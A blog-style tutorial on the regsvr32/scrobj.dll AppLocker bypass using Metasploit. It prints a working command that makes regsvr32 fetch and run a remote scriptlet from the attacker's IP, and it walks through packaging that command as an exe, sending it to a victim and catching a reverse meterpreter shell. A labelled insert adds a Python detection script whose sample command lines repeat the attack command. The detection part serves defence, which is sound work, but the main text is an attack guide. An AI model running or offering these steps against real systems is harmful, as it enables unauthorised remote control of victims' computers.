regsvr32 bypass


It is becoming harder day by day (though not impossible) to compromise Windows: vulnerabilities like ms08_067 are rare now, and of course Windows ships with a lot of security features enabled. But where there is a will, there is always a way. The regsvr32 AppLocker bypass is one such way. To understand how it works, you need to know two things: what a DLL is and what AppLocker is.

AppLocker, introduced in Windows 7 and Windows Server 2008 R2, lets administrators set rules that allow or deny applications from running. Rules can cover executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx). The catch, and the reason this bypass works, is that regsvr32.exe is itself a signed Microsoft binary living in System32, which the default AppLocker rules allow to run, and a scriptlet it loads through scrobj.dll is never evaluated against the script rules.

Ok, now what is a DLL? A DLL is a dynamic link library: a file containing code and data that multiple programs can use at the same time. These libraries usually have the file extensions .dll, .ocx (for libraries containing ActiveX controls), or .drv (for legacy system drivers). A DLL that implements a COM server also exports registration functions (DllRegisterServer, DllUnregisterServer and optionally DllInstall), and regsvr32 is the tool that loads the DLL and calls them.

Ok, now let us see how this exploit works. Start Metasploit and load the exploit module, then check the options we need to set. We can see that the reverse_tcp meterpreter payload is already set; we will use this payload.


Set all the required options. SRVHOST and LHOST are both the IP address of our attacker system (SRVHOST is the address the module serves the .sct file from, LHOST is the address the payload connects back to). After all options are set, type the command "run". The module finishes by printing a command like the one below; this is the command we need to run on our target system.

regsvr32 /s /n /u /i:http://192.168.25.147:8080/Z1115Nj.sct scrobj.dll

Now let us understand this command, discovered by researcher Casey Smith. Regsvr32 is a command line utility that registers and unregisters DLLs (COM servers) by loading them and calling the exports they implement. The '/s' option tells regsvr32 to run silently, without displaying any message boxes. The '/n' option tells it not to call DllRegisterServer; it must be combined with '/i', which makes regsvr32 call the DLL's DllInstall export instead and pass it whatever follows the colon as a string. The '/u' option selects the unregister path, so DllInstall is called with the uninstall flag and nothing is left behind in the registry. The DLL being loaded is scrobj.dll, the Windows Script Component runtime. Its DllInstall treats the '/i' string as the location of a scriptlet (.sct) file, fetches it (here over HTTP from the attacker's IP) and executes the script embedded in the scriptlet's registration section. Nothing here is a vulnerability; every step is documented behaviour, which is why this works on a fully patched system.

You can see above that the module has generated a URL for the .sct file it will serve, and that the command names scrobj.dll as the DLL to load.
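As an added example (this is not code from the original post or from Metasploit, and the sample log lines in it are constructed), the following Python script parses regsvr32 command lines the way a detection rule on process-creation events would: it reads the switches explained above, including the '-' spelling and a full path to scrobj.dll, and flags the three things that together make up this technique, a remote '/i' target, a .sct scriptlet, and scrobj.dll as the loaded DLL. It goes beyond the one command on this page by also handling a UNC path in place of the HTTP URL and by showing a benign regsvr32 call that must not be flagged.

```python
import re
import shlex
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample process-creation command lines (not taken from the
# original post or from any real log). The first reproduces the shape of the
# command the Metasploit module prints; the second and fourth are evasion
# variants a rule must still catch (dash switches, full DLL path, UNC path
# instead of HTTP); the third is a normal, benign regsvr32 call.
SAMPLE_COMMAND_LINES = [
    r'regsvr32 /s /n /u /i:http://192.168.25.147:8080/Z1115Nj.sct scrobj.dll',
    r'regsvr32.exe -s -n -u -i:https://example.test/update.sct C:\Windows\System32\scrobj.dll',
    r'regsvr32 /s "C:\Program Files\Vendor\control.ocx"',
    r'C:\Windows\System32\regsvr32.exe /s /n /i:\\fileserver\share\a.sct scrobj.dll',
]

# A regsvr32 switch: "/s", "-n", "/i:<cmdline>" (switch letter is case-insensitive).
SWITCH_RE = re.compile(r'^[/-]([a-zA-Z])(?::(.*))?$')
# /i arguments that point somewhere other than the local disk (URL or UNC path).
REMOTE_RE = re.compile(r'^(?:https?|ftp)://|^\\\\', re.IGNORECASE)


@dataclass
class Regsvr32Invocation:
    silent: bool = False               # /s : no message boxes
    no_register: bool = False          # /n : skip DllRegisterServer (requires /i)
    unregister: bool = False           # /u : take the unregister path
    install_arg: Optional[str] = None  # /i:<cmdline> handed to DllInstall
    modules: List[str] = field(default_factory=list)  # DLL(s) to load


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, quotes and directories removed."""
    return path.strip('"').replace('/', '\\').rsplit('\\', 1)[-1].lower()


def parse_regsvr32(command_line: str) -> Optional[Regsvr32Invocation]:
    """Return the parsed invocation, or None if the command is not regsvr32 at all."""
    # posix=False keeps Windows backslashes intact and keeps quoted paths whole.
    tokens = shlex.split(command_line, posix=False)
    if not tokens or _basename(tokens[0]) not in ('regsvr32', 'regsvr32.exe'):
        return None
    inv = Regsvr32Invocation()
    for tok in tokens[1:]:
        m = SWITCH_RE.match(tok)
        if m is None:
            inv.modules.append(tok.strip('"'))
            continue
        letter, arg = m.group(1).lower(), m.group(2)
        if letter == 's':
            inv.silent = True
        elif letter == 'n':
            inv.no_register = True
        elif letter == 'u':
            inv.unregister = True
        elif letter == 'i':
            inv.install_arg = (arg or '').strip('"')
    return inv


def assess(inv: Regsvr32Invocation) -> List[str]:
    """Reasons this invocation looks like the scriptlet bypass (empty list = benign)."""
    reasons = []
    if inv.install_arg is not None and REMOTE_RE.match(inv.install_arg):
        reasons.append('/i points to a remote location: ' + inv.install_arg)
    if inv.install_arg is not None and inv.install_arg.lower().endswith('.sct'):
        reasons.append('/i names a scriptlet (.sct) whose registration script will run')
    if any(_basename(m) == 'scrobj.dll' for m in inv.modules):
        reasons.append('loads scrobj.dll, the scriptlet runtime that fetches the /i target')
    return reasons


def scan(command_lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Run the parser over many command lines, skipping anything that is not regsvr32."""
    findings = []
    for cmd in command_lines:
        inv = parse_regsvr32(cmd)
        if inv is not None:
            findings.append((cmd, assess(inv)))
    return findings


if __name__ == '__main__':
    for cmd, reasons in scan(SAMPLE_COMMAND_LINES):
        print(('SUSPICIOUS' if reasons else 'ok') + '  ' + cmd)
        for r in reasons:
            print('    - ' + r)
```

The three signals are scored separately on purpose: a rule that only looks for the literal string "scrobj.dll" misses a renamed copy, and one that only looks for "http" misses a scriptlet pulled from a file share, so a real detection should alert on any one of them and escalate when they coincide.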


Now it's time for our victim to run our command on his system. Copy the command into Notepad and save it as a batch file. Convert this file to an exe and send it to the victim. I have shown one method here.


Now we have to start a listener for the payload.


Set the options exactly as we set them for the exploit: the same reverse_tcp meterpreter payload, LHOST set to our IP, and the port set to 1111. After all the options are set, type "run". If Metasploit reports an error that the address is already in use, that is not a glitch: the exploit module started its own handler on that port when we ran it, so this separate listener is in fact redundant. Either skip it, or change its port and type "run" again; the payload will still connect back to port 1111, where the exploit module's handler is waiting.

After typing "run" the listener waits for an incoming connection.


When our user runs the file we sent him, a meterpreter session is opened.


This may not drop you straight into a meterpreter prompt; the listener you are sitting in may keep waiting even though the session has been opened in the background. Hit CTRL+C to interrupt it.


Next, type "sessions -l" to list the available meterpreter sessions. Then type "sessions -i 2", where "2" is the session id shown in the listing, to interact with it. Next, well, you know what it is.
